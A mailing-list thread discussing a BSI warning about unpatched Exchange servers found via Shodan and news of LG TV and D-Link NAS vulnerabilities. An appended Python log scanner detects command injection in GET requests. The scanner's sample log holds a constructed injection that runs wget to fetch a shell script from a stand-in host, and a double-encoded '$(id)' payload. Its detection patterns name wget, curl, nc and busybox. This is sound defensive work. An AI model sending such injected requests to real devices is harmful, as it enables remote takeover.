[CDT:Lmenouno] German BSI warns: Critical vulnerabilities in (not updated) Exchange servers. (aka Internet of Broken Things)
Good morning, the matter was brought to my attention by a recent message from Antonio [1] on the list, whom I thank.

Executive summary: on 5 March BSI issued a press release (and a PDF report in German) because it found via Shodan [2] that tens of thousands (17K according to those in the know) of MS Exchange servers have still not been updated with critical security updates.

Is that really news? Do you know how many news stories or research pieces can be put together thanks to Shodan about how many servers, routers and "IoT" devices connected to the internet are vulnerable to some "NON zero-day attack" (for which the "patch" is available)? Well, if you didn't know, *know it*: https://duckduckgo.com/?q=shodan+discovered+vulnerable+devices&ia=web

«Critical vulnerabilities in Exchange servers»
https://www.bsi.bund.de/EN/Themen/Unternehmen-und-Organisationen/Information...

--8<---------------cut here---------------start------------->8---
According to the IT service provider Shodan, tens of thousands of Exchange servers in Germany were vulnerable to attack via the Internet and are very likely already infected with malware. This situation affects companies and organisations of all sizes. The BSI recommends installing the security updates provided by Microsoft without delay. Vulnerable Exchange systems should be checked for relevant anomalies as a matter of urgency due to the high risk of attack.

You will find a BSI cyber security warning containing information and measures for dealing with these vulnerabilities: [Microsoft Exchange Schwachstellen Detektion und Reaktion]. The relevant information is continually updated on the BSI website.

[Microsoft Exchange Schwachstellen Detektion und Reaktion]
</SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf?__blob=publicationFile&v=6>

Additional information:
───────────────────────

[Press releases from the BSI - 5. März 2021]
<file:DE/Service-Navi/Presse/Pressemitteilungen/Presse2021/210305_Exchange-Schwachstelle.html?nn=1010128>

[Recording of the BSI-Livestream "Informationen und Hilfestellungen" - 11. März 2021 on YouTube]
<https://youtu.be/QcqRRc-VoB0>

[Further information and links, including external support services]
<file:DE/IT-Sicherheitsvorfall/Unternehmen/unternehmen_node.html>
--8<---------------cut here---------------end--------------->8---

Loving, 380°

[1] https://server-nexa.polito.it/pipermail/nexa/2024-April/052462.html

[2] https://www.shodan.io/
«Shodan is the world's first search engine for Internet-connected devices. Discover how Internet intelligence can help you make better decisions.»
see also: https://en.wikipedia.org/wiki/Shodan_(website)

--
380° (Giovanni Biscuolo public alter ego)
«We, incompetent as we are, have no standing to suggest anything»

Disinformation flourishes because many people care deeply about injustice but very few check the facts.

Ask me about <https://stallmansupport.org>.
380° <g380@biscuolo.net> writes:

[...]

> Do you know how many news stories or research pieces can be put together thanks to Shodan about how many servers, routers and "IoT" devices connected to the internet are vulnerable to some "NON zero-day attack" (for which the "patch" is available)?

And the thing that makes me laugh my head off is this:

--8<---------------cut here---------------start------------->8---
Using Shodan with respect to a device the user does not own is a felony crime under the laws of some states in the United States even if no damage is done to the device or system.
--8<---------------cut here---------------end--------------->8---
via: https://en.wikipedia.org/wiki/Shodan_(website)

I'm sure it is illegal, illegal under the criminal code, in other states not yet documented on Wikipedia too. :-D Off to jail! B-)

> Well, if you didn't know, *know it*: https://duckduckgo.com/?q=shodan+discovered+vulnerable+devices&ia=web

Like, to cite the latest ones:

1. «Over 90,000 LG Smart TVs may be exposed to remote attacks» (9 April 2024)
https://www.bleepingcomputer.com/news/security/over-90-000-lg-smart-tvs-may-...

--8<---------------cut here---------------start------------->8---
CVE-2023-6318 is an elevation of privilege vulnerability that allows attackers to gain root access following the initial unauthorized access provided by CVE-2023-6317.
[...]
Bitdefender reported its findings to LG on November 1, 2023, but it took the vendor until March 22, 2024, to release the related security updates.
[...]
Though TVs are less critical in terms of security, the severity of remote command execution remains potentially significant [...]
--8<---------------cut here---------------end--------------->8---

Let me remind you that it is very likely that all "smart" TVs have a microphone, and some even have a built-in camera.

2. «Critical takeover vulnerabilities in 92,000 D-Link devices under active exploitation» (8 April 2024)
https://arstechnica.com/security/2024/04/hackers-actively-exploit-critical-r...

--8<---------------cut here---------------start------------->8---
Hackers are actively exploiting a pair of recently discovered vulnerabilities to remotely commandeer network-attached storage devices manufactured by D-Link, researchers said Monday. Roughly 92,000 devices are vulnerable to the remote takeover exploits [...]

The first, tracked as CVE-2024-3272 and carrying a severity rating of 9.8 out of 10, is a backdoor account enabled by credentials hardcoded into the firmware. The second is a command-injection flaw tracked as CVE-2024-3273 and has a severity rating of 7.3. It can be remotely activated with a simple HTTP GET request.
--8<---------------cut here---------------end--------------->8---

Let me repeat that for you: "backdoor account enabled by credentials hardcoded into the firmware". Clear?!?

Do you see why the *supposed* distinction between software and firmware annoys me? There are "industry experts" who still /preach/ it.

...in short, business as _usual_, no?

Loving, 380°

--
380° (Giovanni Biscuolo public alter ego)
«We, incompetent as we are, have no standing to suggest anything»

Disinformation flourishes because many people care deeply about injustice but very few check the facts.

Ask me about <https://stallmansupport.org>.
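The D-Link item quoted above notes that the command-injection flaw is triggered by a plain HTTP GET request, and the BSI text in the first message asks that exposed systems be checked for anomalies. As an added example that is not part of this thread nor of any of the cited reports, the following Python script scans web-server access-log lines for command-injection indicators carried in GET query strings, including the double-encoded variant that a single-decoding filter would miss. The log lines, IP addresses and the `/cgi-bin/status.cgi` path are all constructed for illustration and do not reproduce the real D-Link request.

```python
"""Flag HTTP GET requests whose query parameters look like shell command
injection. Added example: not from the thread above or any vendor advisory."""
import re
from urllib.parse import unquote_plus, urlsplit

# Combined access-log format (assumed layout; adjust LOG_RE to the real one).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Shell metacharacters that let a value break out of a command argument,
# and command names that typically follow such a break-out.
SHELL_META = re.compile(r'[;&|`$\n\r]')
SHELL_WORDS = re.compile(r'\b(?:sh|bash|wget|curl|nc|telnetd|busybox|chmod|tftp)\b')

# Constructed log lines: a benign request, two injection attempts (the
# second one double-encoded), and a POST that this GET-only scan skips.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Apr/2024:10:12:01 +0000] "GET /cgi-bin/status.cgi?page=home HTTP/1.1" 200 512',
    '198.51.100.23 - - [08/Apr/2024:10:12:09 +0000] "GET /cgi-bin/status.cgi?page=home;wget%20http://198.51.100.23/x.sh HTTP/1.1" 200 133',
    '198.51.100.23 - - [08/Apr/2024:10:12:15 +0000] "GET /cgi-bin/status.cgi?page=%2524%2528id%2529 HTTP/1.1" 500 0',
    '203.0.113.9 - - [08/Apr/2024:10:13:00 +0000] "POST /cgi-bin/login.cgi HTTP/1.1" 302 0',
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(target):
    """Split the query string on '&' and '=' and percent-decode each part.

    Done by hand rather than with urllib.parse.parse_qsl so that a ';' inside
    a value is kept as data (older parse_qsl versions split on it too).
    """
    query = urlsplit(target).query
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        yield unquote_plus(name), unquote_plus(value)


def injection_indicators(target):
    """Return a sorted list of reasons the request target looks like injection."""
    reasons = set()
    for name, value in query_params(target):
        # Decode a second time: double-encoding hides '$(' as '%2524%2528'
        # from any filter that decodes only once.
        decoded = unquote_plus(value)
        if SHELL_META.search(decoded):
            reasons.add(f"shell metacharacter in parameter '{name}'")
        if SHELL_WORDS.search(decoded):
            reasons.add(f"shell command name in parameter '{name}'")
    return sorted(reasons)


def scan_log(lines):
    """Return (client_ip, request_target, reasons) for each suspicious GET."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        reasons = injection_indicators(rec["target"])
        if reasons:
            findings.append((rec["ip"], rec["target"], reasons))
    return findings


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {target}\n    " + "\n    ".join(reasons))
```

Run against the constructed sample, the scan reports the two requests from 198.51.100.23 and stays silent on the benign page load; the second hit is caught only because the parameter is decoded twice. In practice the pattern lists are a starting point to tune against the device's real CGI endpoints, and a hit is a prompt to check the host for the anomalies the BSI note asks about, not proof of compromise.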